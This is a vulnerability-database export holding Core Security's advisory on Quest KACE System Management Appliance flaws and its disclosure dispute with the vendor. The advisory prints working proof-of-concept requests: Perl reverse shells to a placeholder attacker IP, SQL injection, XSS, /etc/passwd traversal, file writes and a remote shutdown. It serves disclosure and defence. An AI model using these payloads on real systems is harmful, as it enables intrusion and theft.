"trust": 3.0,
"url": "https://support.quest.com/kb/288310/cert-coordination-center-report-update"
},
{
"trust": 3.0,
"url": "https://www.kb.cert.org/vuls/id/877837/"
},
{
"trust": 2.0,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-5404"
},
{
"trust": 1.6,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-5404"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-5405"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-5406"
},
{
"trust": 0.8,
"url": "https://support.quest.com/kace-systems-management-appliance/9.1/download-new-releaseshttps://support.quest.com/https://support.quest.com/kb/288310/cert-coordination-center-report-update"
},
{
"trust": 0.8,
"url": "https://jvn.jp/vu/jvnvu91210160/index.html"
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#877837"
},
{
"db": "CNVD",
"id": "CNVD-2019-21112"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015568"
},
{
"db": "NVD",
"id": "CVE-2018-5404"
},
{
"db": "CNNVD",
"id": "CNNVD-201906-043"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CERT/CC",
"id": "VU#877837"
},
{
"db": "CNVD",
"id": "CNVD-2019-21112"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015568"
},
{
"db": "NVD",
"id": "CVE-2018-5404"
},
{
"db": "CNNVD",
"id": "CNNVD-201906-043"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-06-01T00:00:00",
"db": "CERT/CC",
"id": "VU#877837"
},
{
"date": "2019-07-04T00:00:00",
"db": "CNVD",
"id": "CNVD-2019-21112"
},
{
"date": "2019-06-17T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-015568"
},
{
"date": "2019-06-03T19:29:01.593000",
"db": "NVD",
"id": "CVE-2018-5404"
},
{
"date": "2019-06-03T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201906-043"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-06-03T00:00:00",
"db": "CERT/CC",
"id": "VU#877837"
},
{
"date": "2019-07-04T00:00:00",
"db": "CNVD",
"id": "CNVD-2019-21112"
},
{
"date": "2019-06-17T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-015568"
},
{
"date": "2019-10-09T23:41:18.487000",
"db": "NVD",
"id": "CVE-2018-5404"
},
{
"date": "2019-06-06T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201906-043"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201906-043"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Quest Software Kace K1000 Appliance SQL Injection Vulnerability",
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-21112"
},
{
"db": "CNNVD",
"id": "CNNVD-201906-043"
}
],
"trust": 1.2
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SQL injection",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201906-043"
}
],
"trust": 0.6
}
}
VAR-201805-0593
Vulnerability from variot - Updated: 2023-12-18 12:01The 'fmt' parameter of the '/common/run_cross_report.php' script in the the Quest KACE System Management Appliance 8.0.318 is vulnerable to cross-site scripting. QuestKACESystemManagementAppliance is an IT asset management device from QuestSoftware, USA. A remote attacker can exploit this vulnerability to inject arbitrary web scripts or HTML. Advisory Information
Title: Quest KACE System Management Appliance Multiple Vulnerabilities Advisory ID: CORE-2018-0004 Advisory URL: http://www.coresecurity.com/advisories/quest-kace-system-management-appliance-multiple-vulnerabilities Date published: 2018-05-31 Date of last update: 2018-05-22 Vendors contacted: Quest Software Inc. Release mode: Forced release
- Vulnerability Information
Class: Improper Neutralization of Special Elements used in an OS Command [CWE-78], Improper Neutralization of Special Elements used in an OS Command [CWE-78], Deserialization of Untrusted Data [CWE-502], Improper Privilege Management [CWE-269], Improper Privilege Management [CWE-269], Improper Authorization [CWE-285], Improper Neutralization of Special Elements used in an SQL Command [CWE-89], Improper Neutralization of Special Elements used in an SQL Command [CWE-89], Improper Neutralization of Input During Web Page Generation [CWE-79], External Control of File Name or Path [CWE-73], External Control of File Name or Path [CWE-73] Impact: Code execution Remotely Exploitable: Yes Locally Exploitable: Yes CVE Name: CVE-2018-11138, CVE-2018-11139, CVE-2018-11135, CVE-2018-11134, CVE-2018-11132, CVE-2018-11142, CVE-2018-11136, CVE-2018-11140, CVE-2018-11133, CVE-2018-11137, CVE-2018-11141
- Vulnerability Description
From Quest KACE's website:
"The KACE Systems Management Appliance [1] provides your growing organization with comprehensive management of network-connected devices, including servers, PCs, Macs, Chromebooks, tablets, printers, storage, networking gear and the Internet of Things (IoT). KACE can fulfill all of your organization's systems management needs, from initial deployment to ongoing management and retirement."
Multiple vulnerabilities were found in the Quest KACE System Management Virtual Appliance that would allow a remote attacker to gain command execution as root. We present three vectors to achieve this, including one that can be exploited as an unauthenticated user.
Additional web application vulnerabilities were found in the web console that is bundled with the product. These vulnerabilities are detailed in section 7.
Note: This advisory has limited details on the vulnerabilities because during the attempted coordinated disclosure process, Quest advised us not to distribute our original findings to the public or else they would take legal action. Quest's definition of "responsible disclosure" can be found at https://support.quest.com/essentials/reporting-security-vulnerability.
CoreLabs has been publishing security advisories since 1997 and believes in coordinated disclosure and good faith collaboration with software vendors before disclosure to help ensure that a fix or workaround solution is ready and available when the vulnerability details are publicized. We believe that providing technical details about each finding is necessary to provide users and organizations with enough information to understand the implications of the vulnerabilities against their environment and, most importantly, to prioritize the remediation activities aiming at mitigating risk.
We regret Quest's posture on disclosure during the whole process (detailed in the Report Timeline section) and the lack of a possibility of engaging into a coordinated publication date, something we achieve (and have achieved) with many vendors as part of our coordinated disclosure practices.
- Vulnerable Packages
.
- Vendor Information, Solutions and Workarounds
Quest reports that it has released the security vulnerability patch SEC2018_20180410 to address the reported vulnerabilities. Patch can be download at https://support.quest.com/download-install-detail/6086148.
For more details, Quest published the following Security Note: https://support.quest.com/kace-systems-management-appliance/kb/254193/security-vulnerability-patch-sec2018_20180410-
- Credits
These vulnerabilities were discovered and researched by Leandro Barragan and Guido Leo from Core Security Consulting Services. The publication of this advisory was coordinated by Leandro Cuozzo from Core Advisories Team.
- Technical Description / Proof of Concept Code
Quest KACE SMA ships with a web console that provides administrators and users with several features. Multiple vulnerabilities were found in the context of this console, both from an authenticated and unauthenticated perspective.
Section 7.1 describes how an unauthenticated attacker could gain command execution on the system as the web server user.
Vulnerabilities described in 7.2 and 7.3 could also be abused to gain code execution but would require the attacker to have a valid authentication token.
In addition, issues found in the Sudo Server module presented in 7.4 and 7.5 would allow the attacker to elevate his privileges from the web server user to root, effectively obtaining full control of the device.
Additional web application vulnerabilities were found in the console, such as insufficient authorization for critical functions, which would allow an anonymous attacker to reconfigure the appliance (7.6), SQL injection vulnerabilities (7.7, 7,8), a cross-site scripting issue (7.9), and path traversal vulnerabilities, which would allow an attacker to read, write and delete arbitrary files (7.9, 7.10, 7.11).
7.1. Unauthenticated command injection
[CVE-2018-11138] The '/common/download_agent_installer.php' script is accessible to anonymous users in order to download an agent for a specific platform. This behavior can be abused to execute arbitrary commands on the system.
The script receives the following parameters via the GET method:
. platform: Indicates the platform in which the agent is going to be installed . serv: SHA256 hash of a fixed value that depends of each appliance . orgid: Organization ID . version: Version number of the agent
The last two conditions are simple to meet. The Agent versions are publicly available within the Quest KACE site, but even if they were not, we found that the Organization ID parameter is vulnerable to a time based SQL injection (refer to issue 7.7). This would make it possible to obtain the agent version by querying the table 'CLIENT_DISTRIBUTION' and fetching the contents of the 'VERSION' column. The Organization ID is 1 by default, but could be obtained in the same way as the Agent version by querying the table 'ORGANIZATION' and the column 'ID'.
As stated above, the application uses the Organization ID and Agent version parameters to execute commands. This means we need to find a way to append system commands within the Organization ID, without breaking the SQL query. If we use the comment symbol (#), we can append anything we want without affecting the result of the query.
Preparing payload:
/----- - platform = windows - serv = ceee78c2dc2af5587fa1e205d9a8cdfd55d7be35c7958858b5656d12550cc75c - orgid = 1#;perl -e 'use Socket;$i="[AttackerIP]";$p=8080;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");};'; - version = 8.0.152 (last agent version available for windows) -----/
The following proof of concept executes a reverse shell:
/----- GET /common/download_agent_installer.php?platform=windows&serv=ceee78c2dc2af5587fa1e205d9a8cdfd55d7be35c7958858b5656d12550cc75c&orgid=1%23%3bperl+-e+'use+Socket%3b$i%3d"[AttackerIP]"%3b$p%3d8080%3bsocket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"))%3bif(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">%26S")%3bopen(STDOUT,">%26S")%3bopen(STDERR,">%26S")%3bexec("/bin/sh+-i")%3b}%3b'%3b&version=8.0.152 HTTP/1.1 Host: Server Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded Content-Length: 0 -----/
/----- $ nc -lvp 8080 Listening on [0.0.0.0] (family 0, port 8080) Connection from [ServerIP] port 8080 [tcp/http-alt] accepted (family 2, sport 20050) sh: can't access tty; job control turned off $ id uid=80(www) gid=80(www) groups=80(www) -----/
7.2. Authenticated command injection
[CVE-2018-11139] The '/common/ajax_email_connection_test.php' script used to test the configured SMTP server is accessible by any authenticated user and can be abused to execute arbitrary commands on the system. This script is vulnerable to command injection via the unsanitized user input 'TEST_SERVER' sent to the script via POST method.
The following proof of concept executes a reverse shell:
/----- POST /common/ajax_email_connection_test.php HTTP/1.1 Host: [ServerIP] Accept: application/json, text/javascript, /; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 416 Cookie: [Cookie] Connection: close
TEST_SERVER=test;perl+-e+'use+Socket%3b$i%3d"[AttackerIP]"%3b$p%3d8080%3bsocket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"))%3bif(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">%26S")%3bopen(STDOUT,">%26S")%3bopen(STDERR,">%26S")%3bexec("/bin/sh+-i")%3b}%3b';&TEST_PORT=587&TEST_USERNAME=eaea@eaea.com&TEST_PASSWORD=1234&TEST_OLD_PASSWORD=&QUEUE_ID=1&TEST_TO_EMAIL=eaea@eaea.com&ACTION=TEST_CONNECTION_SMTP -----/
/----- $ nc -lvp 8080 Listening on [0.0.0.0] (family 0, port 8080) Connection from [ServerIP] port 8080 [tcp/http-alt] accepted (family 2, sport 20050) sh: can't access tty; job control turned off $ id uid=80(www) gid=80(www) groups=80(www) -----/
7.3. PHP Object Injection leading to arbitrary command execution
[CVE-2018-11135] An authenticated user could abuse a deserialization call on the script '/adminui/error_details.php' to inject arbitrary PHP objects.
To exploit this issue, the parameter 'ERROR_MESSAGES' needs to be an array and meet some specific conditions in order to successfully exploit the issue.
7.4. Privilege escalation via password change in Sudo Server
[CVE-2018-11134] In order to perform actions that requires higher privileges, the application relies on a message queue managed that runs with root privileges and only allows a set of commands.
One of the available commands allows to change any user's password (including root).
Assuming we are able to run commands in the server, we could abuse this feature by changing the password of the 'kace_support' account, which comes disabled by default but has full sudo privileges.
7.5. Privilege escalation via command injection in Sudo Server
[CVE-2018-11132] As mentioned in the issue [7.4], in order to perform actions that require higher privileges, the application relies on a message queue that runs daemonized with root privileges and only allows a set of commands to be executed.
A command injection vulnerability exists within this message queue which allows us to append arbitrary commands that will be run as root.
7.6. Insufficient Authorization for critical function
[CVE-2018-11142] 'systemui/settings_network.php' and 'systemui/settings_patching.php' scripts are accessible only from localhost. This restriction can be bypassed by modifying the 'Host' and 'X_Forwarded_For' HTTP headers.
The following proof of concept abuses this vulnerability to shutdown the server as an anonymous user:
/----- POST /systemui/settings_network.php HTTP/1.1 Host: localhost X-Forwarded-For: ::1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://[ServerIp]/systemui/settings_network.php Content-Type: multipart/form-data; boundary=---------------------------5642543667001619951434940129 Content-Length: 3418 Connection: close Upgrade-Insecure-Requests: 1
-----------------------------5642543667001619951434940129 Content-Disposition: form-data; name="CSRF_TOKEN" -----------------------------5642543667001619951434940129 Content-Disposition: form-data; name="$shutdown" DoIt! Content-Disposition: form-data; name="save" Save -----------------------------5642543667001619951434940129-- -----/
7.7. Unauthenticated SQL Injection in download_agent_installer.php
[CVE-2018-11136] The 'orgID' parameter received by the '/common/download_agent_installer.php' script is not sanitized, leading to SQL injection. In particular, a blind time based type.
The following proof of concept induces a time delay:
/----- http://[ServerIP]/common/download_agent_installer.php?platform=windows&serv=58b9e89c12f57e492df8f1d744b6ed5a4d394b454ca8a99176caba35fd13ec1f&orgid=1 AND SLEEP(10)%23;&version=8.0.152 -----/
7.8. SQL Injection in run_report.php
[CVE-2018-11140] The 'reportID' parameter received by the '/common/run_report.php' script is not sanitized, leading to SQL injection. In particular, an error based type.
The following proof of concept retrieves the current database name:
/----- POST /common/run_report.php HTTP/1.1 Content-Length: 161 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Host: [ServerIP] Accept: text/html,application/xhtml xml,application/xml;q=0.9,/;q=0.8 Connection: close Referer: http://[ServerIP]/adminui/analysis_report_list.php?CATEGORY_ID= Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded Cookie: [Cookie]
date=1516135247598&reportId=-3161+UNION+ALL+SELECT+CONCAT(0x7170706a71,IFNULL(CAST(DATABASE()+AS+CHAR),0x20),0x716a707171),NULL--+LhEx&reportName=&format=pdf -----/
/----- HTTP/1.1 200 OK Date: Thu, 08 Feb 2018 21:50:21 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Access-Control-Allow-Headers: x-kace-auth-timestamp, x-kace-auth-key, x-kace-auth-signature, accept, origin, content-type Access-Control-Allow-Origin: * Access-Control-Allow-Methods: PUT, DELETE, POST, GET, OPTIONS X-KACE-Appliance: K1000 X-KACE-Host: [ServerIP] X-KACE-Version: 8.0.318 X-KBOX-WebServer: [ServerIP] X-KBOX-Version: 8.0.318 X-KACE-WebServer: [ServerIP] X-UA-Compatible: IE=9,EDGE Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform Content-Length: 3548 Connection: close Content-Type: text/html; charset=utf-8
[...SNIPPED...]
<![endif]-->Report Queued: qppjqORG1qjpqq<meta http-equiv='refresh' [...SNIPPED...] -----/
7.9.
The following proof of concept demonstrates the vulnerability:
/----- http://[ServerIP]/common/run_cross_report.php?uniqueId=366314513&id=585&org=1&fmt=xls34403')%3balert(1)%2f%2f952 -----/
7.10. Path traversal in download_attachment.php leading to arbitrary file read
[CVE-2018-11137] The 'checksum' parameter of the '/common/download_attachment.php' script can be abused to read arbitrary files with 'www' privileges. The following proof of concept reads the '/etc/passwd' file. No administrator privileges are needed to execute this script.
It is worth noting that there are several interesting files that can be read with 'www' privileges, such as all the files located in '/kbox/bin/koneas/keys/' and '/kbox/kboxwww/include/globals.inc', which contain plaintext passwords.
/----- http://[ServerIP]/common/run_cross_report.php?uniqueId=366314513&id=585&org=1&fmt=xls34403')%3balert(1)%2f%2f952 -----/
The following proof of concept demonstrates the vulnerability:
/----- GET /common/download_attachment.php?checksum=/../../../../../../../../../../../etc/passwd&filename= HTTP/1.1 Host: [ServerIP] Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: [Cookie] Connection: close Upgrade-Insecure-Requests: 1
HTTP/1.1 200 OK Date: Thu, 18 Jan 2018 17:18:19 GMT Server: Apache Cache-Control: must-revalidate, post-check=0, pre-check=0 Expires: -1 Pragma: public Content-Disposition: attachment; filename="" Content-Transfer-Encoding: Binary Content-Description: K1000 attachment Content-Length: 2400 Access-Control-Allow-Headers: x-kace-auth-timestamp, x-kace-auth-key, x-kace-auth-signature, accept, origin, content-type Access-Control-Allow-Origin: * Access-Control-Allow-Methods: PUT, DELETE, POST, GET, OPTIONS X-KACE-Appliance: K1000 X-KACE-Host: k10000. X-KACE-Version: 8.0.318 X-KBOX-WebServer: k10000. X-KBOX-Version: 8.0.318 X-KACE-WebServer: k10000. X-UA-Compatible: IE=9,EDGE Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform Connection: close Content-Type: application/octet-stream
$FreeBSD: releng/11.0/etc/master.passwd 299365 2016-05-10 12:47:36Z bcr $
root::0:0:Charlie &:/root:/bin/csh daemon::1:1:Owner of many system processes:/root:/usr/sbin/nologin operator::2:5:System &:/:/usr/sbin/nologin bin::3:7:Binaries Commands and Source:/:/usr/sbin/nologin tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin[...SNIPPED...] -----/
7.11. Path traversal in advisory.php leading to arbitrary file creation/deletion
[CVE-2018-11141] The 'IMAGES_JSON' and 'attachments_to_remove[]' parameters of the '/adminui/advisory.php' script can be abused to write and delete files respectively. The following proof of concept creates a file located at '/kbox/kboxwww/resources/TestWrite' with the content 'Sarasa' (base64 encoded). Files can be at any location where the 'www' user has write permissions.
File deletion could be abused to delete '/kbox/kboxwww/systemui/reports/setup_completed.log' file. This file's existence defines if the appliance setup wizard is shown or not.
The following proof of concept demonstrates the vulnerability:
/----- POST /adminui/advisory.php?ID=10 HTTP/1.1 Host: [ServerIP] Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://[ServerIP]/adminui/advisory.php?ID=10 Content-Type: multipart/form-data; boundary=---------------------------2671551246366368501556269100 Content-Length: 1705 Cookie: [Cookie] Connection: close Upgrade-Insecure-Requests: 1
-----------------------------2671551246366368501556269100 Content-Disposition: form-data; name="CSRF_TOKEN"
99c2addf067719d6fc3ae32ded351f000af8efdd091f162baa2a34516cefecc741cb13a69c80554a9ba32908d1c683102d3455eac39bcafc8854f46a04b2044e -----------------------------2671551246366368501556269100 Content-Disposition: form-data; name="IMAGES_JSON"
{"/../../../resources/TestWrite":"aaaaaa,VGVzdENvbnRlbnQ="} -----------------------------2671551246366368501556269100 Content-Disposition: form-data; name="FARRAY[ID]" [...SNIPPED...] -----/
Taking advantage of 7.2 and 7.4 we are able to verify the file creation:
/----- [root@k10000 /kbox/kboxwww/resources]# ls -lha total 32 drwxr-xr-x 2 www wheel 512B Feb 9 20:40 . drwxr-xr-x 23 root wheel 512B Nov 14 18:29 .. -rw-r--r-- 1 www wheel 11B Feb 9 20:40 TestWrite -----/
-
Report Timeline 2018-02-26: Core Security (Core) sent an initial notification to Quest Software Inc. (Quest) via web form. 2018-03-05: Quest Support confirmed the receipt and requested additional information. 2018-03-12: Core Security sent a draft advisory including a technical description. 2018-03-16: Quest Support asked for the CVE-IDs. 2018-03-16: Core Security answered saying that the CVE-IDs are required once the vendor verifies the vulnerabilities. Additionally, Core Security requested a confirmation about the reported vulnerabilities and a tentative timescale to fix them. Finally, Core Security requested that Quest use Core's advisories-publication email address as the official communication hannel also copying the researchers behind this discovery. 2018-03-16: Quest Support thanked Core's reply and stated it will be in touch during the process. 2018-03-20: Quest Support informed that they had not yet received any updates from the engineering team and had requested one. 2018-03-21: Quest Support requested information about the KACE version used for reporting the issues and also Core's company name and information. 2018-03-21: Core replied with the affected version (that was included in the original draft advisory) and a link to the Core company website and the list of previous security advisories. 2018-03-21: Quest Support acknowledged the information provided. 2018-03-26: Quest's KACE product manager (PM) thanked Core for making it aware of the security issues found and the level of thoroughness and details provided. Quest specified it had fixes already in place for some of the issues. Quest's KACE PM asked for a conference call in order to understand more about Core's offerings for future engagements. Finally, Quest's KACE PM notified the work done by Core is in breach of its license agreement, and requested Core not to distribute the findings to the public, otherwise uest would take legal action. 2018-04-13: Quest's KACE PM sent a follow up email and informed that it made a hotfix to patch the reported vulnerabilities. Quest also requested a call meeting to understand future opportunities based on the Core's company capabilities. Finally, Quest asked for information about the researcher that found the vulnerabilities and a link of Core's choosing in order to be included in Quest's Acknowledgment page (https://support.quest.com/essentials/vulnerability-reporting-acknowledgements). 2018-04-16: Core answered email from 2018-03-26 stating the company is following standard practices with regards to coordinated vulnerability disclosure, and also sent detailed technical information about our findings at Quest's request. Core also mentioned Quest seems to be well versed in the disclosure process and expects vendors to coordinate with it prior to publication via Quest's vulnerability reporting process, and that Quest's legal threat appears to be in direct contradiction to the disclosure process that they encourage on their website. Finally, Core asked about Quest's intention to work collaboratively to address these vulnerabilities and to follow industry standard disclosure processes that involves publication of the vulnerabilities. 2018-04-17: Quest's KACE PM replied saying it is willing to collaborate and is looking forward to having a conversation over the phone in order to continue the next steps in its vulnerability process (forwarded email from 2018-04-13). 2018-04-17: Core thanked the answer and stated the willingness of keeping written communications between parties in order to better document the process and communicated the next steps of the process including: 1. Testing the fix (if vendor agrees), 2. Get CVE-IDs, 3. Get a Vendor's link to be included in the advisory and finally 4. Send final advisory version to vendor and coordinate publication date together. With regards to Quest's requests, Core provided the researchers names and URL of the advisory when it will be published. Finally, Core stated that the request for other Core company services could be forwarded to the Core services team if needed (and asked the right contact at Quest) but our intention is to keep that services request separate from the coordinated disclosure process. 2018-04-18: Quest Support informed that they had publicly made available patches for its customers and unilaterally closed the case. 2018-05-31: Advisory CORE-2018-0004 published.
-
References
[1] https://www.quest.com/products/kace-systems-management-appliance/
- About CoreLabs
CoreLabs, the research center of Core Security, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber-attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com.
- About Core Security
Core Security provides companies with the security insight they need to know who, how, and what is vulnerable in their organization. The company's threat-aware, identity amp; access, network security, and vulnerability management solutions provide actionable insight and context needed to manage security risks across the enterprise. This shared insight gives customers a comprehensive view of their security posture to make better security remediation decisions. Better insight allows organizations to prioritize their efforts to protect critical assets, take action sooner to mitigate access risk, and react faster if a breach does occur.
Core Security is headquartered in the USA with offices and operations in South America, Europe, Middle East and Asia. To learn more, contact Core Security at (678) 304-4500 or info@coresecurity.com
- Disclaimer
The contents of this advisory are copyright (c) 2018 Core Security and (c) 2018 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/
- PGP/GPG Keys
This advisory has been signed with the GPG key of Core Security advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201805-0593",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "kace system management appliance",
"scope": "eq",
"trust": 2.2,
"vendor": "quest",
"version": "8.0.318"
},
{
"model": "kace systems management appliance",
"scope": "eq",
"trust": 0.8,
"vendor": "quest",
"version": "8.0.318"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-15640"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-005408"
},
{
"db": "NVD",
"id": "CVE-2018-11133"
},
{
"db": "CNNVD",
"id": "CNNVD-201805-1221"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:quest:kace_system_management_appliance:8.0.318:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2018-11133"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Core Security Technologies, Leandro Barragan, Guido Leo",
"sources": [
{
"db": "PACKETSTORM",
"id": "148005"
}
],
"trust": 0.1
},
"cve": "CVE-2018-11133",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": true,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Medium",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 4.3,
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2018-11133",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.9,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "CNVD-2018-15640",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"exploitabilityScore": 2.8,
"impactScore": 2.7,
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"trust": 1.0,
